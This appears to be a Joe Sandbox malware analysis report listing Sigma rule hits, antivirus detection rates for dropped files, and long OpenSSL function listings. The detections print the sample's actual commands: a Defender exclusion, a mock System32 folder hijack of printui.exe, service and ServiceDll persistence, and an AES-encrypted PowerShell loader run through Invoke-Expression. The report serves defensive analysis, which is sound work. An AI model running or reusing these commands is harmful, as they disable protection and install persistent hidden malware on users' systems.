    Sigma detected: WScript or CScript Dropper
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4552, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" , ProcessId: 6276, ProcessName: wscript.exe
    Sigma detected: Explorer Process Tree Break
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber: Data: Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 804, ProcessCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ProcessId: 2152, ProcessName: explorer.exe
    Sigma detected: Powershell Defender Exclusion
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 2924, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", ProcessId: 5040, ProcessName: cmd.exe
    Sigma detected: Suspicious Copy From or To System Directory
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y, CommandLine: xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\xcopy.exe, NewProcessName: C:\Windows\System32\xcopy.exe, OriginalFileName: C:\Windows\System32\xcopy.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2044, ParentProcessName: cmd.exe, ProcessCommandLine: xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y, ProcessId: 3268, ProcessName: xcopy.exe
    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4552, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" , ProcessId: 6276, ProcessName: wscript.exe
    Sigma detected: New Service Creation Using Sc.EXE
    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7072, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 1256, ProcessName: sc.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;", CommandLine: powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky
    Sigma detected: Windows Processes Suspicious Parent Directory
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6324, ProcessName: svchost.exe

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.datReversingLabs: Detection: 54%
    Source: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.datVirustotal: Detection: 41%Perma Link
    Source: C:\Windows \System32\x249569.datReversingLabs: Detection: 54%
    Source: C:\Windows \System32\x249569.datVirustotal: Detection: 41%Perma Link
    Source: C:\Windows\System32\console_zero.exeReversingLabs: Detection: 75%
    Source: C:\Windows\System32\console_zero.exeVirustotal: Detection: 71%Perma Link
    Source: C:\Windows\System32\usvc.datReversingLabs: Detection: 95%
    Source: C:\Windows\System32\usvc.datVirustotal: Detection: 56%Perma Link
    Source: C:\Windows\System32\x338625.datReversingLabs: Detection: 79%
    Multi AV Scanner detection for submitted file
    Source: F.7zReversingLabs: Detection: 27%
    Source: F.7zVirustotal: Detection: 31%Perma Link
    Machine Learning detection for dropped file
    Source: C:\Windows\System32\x338625.datJoe Sandbox ML: detected
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE72DB0 OPENSSL_LH_retrieve,CRYPTO_free,OPENSSL_LH_delete,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,46_2_00007FFA2CE72DB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2EDB0 CRYPTO_THREAD_run_once,46_2_00007FFA2CE2EDB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA0D80 CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CEA0D80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE54D30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,46_2_00007FFA2CE54D30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4CD10 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE4CD10
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7ED00 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE7ED00
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2ECD0 COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,46_2_00007FFA2CE2ECD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE94CC0 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE94CC0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE24E80 CRYPTO_free,46_2_00007FFA2CE24E80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7EDD0 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE7EDD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3CDC0 CRYPTO_malloc,CRYPTO_clear_free,46_2_00007FFA2CE3CDC0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE82FA0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,46_2_00007FFA2CE82FA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8EFA0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,46_2_00007FFA2CE8EFA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE72F60 EVP_EncryptUpdate,OPENSSL_LH_retrieve,46_2_00007FFA2CE72F60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE96F60 memchr,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE96F60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE32F50 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,46_2_00007FFA2CE32F50
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE72F00 OPENSSL_LH_free,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,46_2_00007FFA2CE72F00
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE40EF0 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE40EF0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7EED0 CRYPTO_malloc,CRYPTO_free,46_2_00007FFA2CE7EED0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4CED0 CRYPTO_free,memset,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE4CED0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2B0B0 i2d_PUBKEY,ASN1_item_i2d,CRYPTO_free,46_2_00007FFA2CE2B0B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA1090 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CEA1090
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE35070 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,46_2_00007FFA2CE35070
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE35050 CRYPTO_set_ex_data,46_2_00007FFA2CE35050
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE73040 RAND_priv_bytes_ex,CRYPTO_zalloc,EVP_CIPHER_fetch,EVP_CIPHER_CTX_new,EVP_CIPHER_free,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_doall,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,EVP_CIPHER_free,46_2_00007FFA2CE73040
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE45040 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE45040
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8B040 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE8B040
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE21030 GetEnvironmentVariableW,GetACP,MultiByteToWideChar,malloc,MultiByteToWideChar,GetEnvironmentVariableW,malloc,GetEnvironmentVariableW,WideCharToMultiByte,CRYPTO_malloc,WideCharToMultiByte,CRYPTO_free,free,free,getenv,46_2_00007FFA2CE21030
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2D010 EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE2D010
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE41000 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_realloc,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE41000
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6CFF0 CRYPTO_realloc,46_2_00007FFA2CE6CFF0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8AFE0 CRYPTO_free,46_2_00007FFA2CE8AFE0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA8FD0 CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,46_2_00007FFA2CEA8FD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE26FC0 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,46_2_00007FFA2CE26FC0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4C9A0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE4C9A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6E960 BIO_ADDR_family,BIO_ADDR_family,memcmp,BIO_ADDR_family,BIO_ADDR_family,memcmp,CRYPTO_malloc,BIO_ADDR_clear,BIO_ADDR_clear,46_2_00007FFA2CE6E960
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7A940 CRYPTO_zalloc,46_2_00007FFA2CE7A940
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE22940 CRYPTO_zalloc,_beginthreadex,CRYPTO_free,46_2_00007FFA2CE22940
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE92930 CRYPTO_realloc,46_2_00007FFA2CE92930
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6A910 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,46_2_00007FFA2CE6A910
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2CAB0 X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,46_2_00007FFA2CE2CAB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE36A90 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,OSSL_PARAM_construct_int,OSSL_PARAM_construct_end,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,46_2_00007FFA2CE36A90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE22A80 CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE22A80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7AA70 CRYPTO_realloc,46_2_00007FFA2CE7AA70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE34A72 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE34A72
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE86A60 ERR_new,ERR_set_debug,SetLastError,BIO_write,BIO_test_flags,BIO_test_flags,ERR_new,ERR_set_debug,CRYPTO_free,46_2_00007FFA2CE86A60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE54A60 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,46_2_00007FFA2CE54A60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE96A30 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE96A30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44A20 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE44A20
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE349F0 CRYPTO_memdup,CRYPTO_free,46_2_00007FFA2CE349F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA69E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,EVP_CIPHER_free,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free,46_2_00007FFA2CEA69E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3E9C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,46_2_00007FFA2CE3E9C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE949C0 CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,46_2_00007FFA2CE949C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE56BB0 CRYPTO_malloc,46_2_00007FFA2CE56BB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE72BA0 OPENSSL_LH_retrieve,CRYPTO_zalloc,CRYPTO_free,OPENSSL_LH_insert,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_insert,46_2_00007FFA2CE72BA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE88B90 BIO_free,BIO_free,BIO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,CRYPTO_free,46_2_00007FFA2CE88B90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE98B90 CRYPTO_free,CRYPTO_memdup,46_2_00007FFA2CE98B90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6AB80 CRYPTO_free,46_2_00007FFA2CE6AB80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4CB80 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE4CB80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2AB80 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,X509_free,EVP_PKEY_free,d2i_PUBKEY_ex,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,46_2_00007FFA2CE2AB80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2CB70 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_memdup,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,46_2_00007FFA2CE2CB70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE56B30 CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE56B30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8CB30 EVP_MD_get_size,ERR_new,ERR_set_debug,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,EVP_DigestUpdate,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key_ex,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,46_2_00007FFA2CE8CB30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA0B30 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CEA0B30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7EB20 CRYPTO_free,46_2_00007FFA2CE7EB20
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE90B20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,46_2_00007FFA2CE90B20
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3AAD0 CRYPTO_set_ex_data,46_2_00007FFA2CE3AAD0
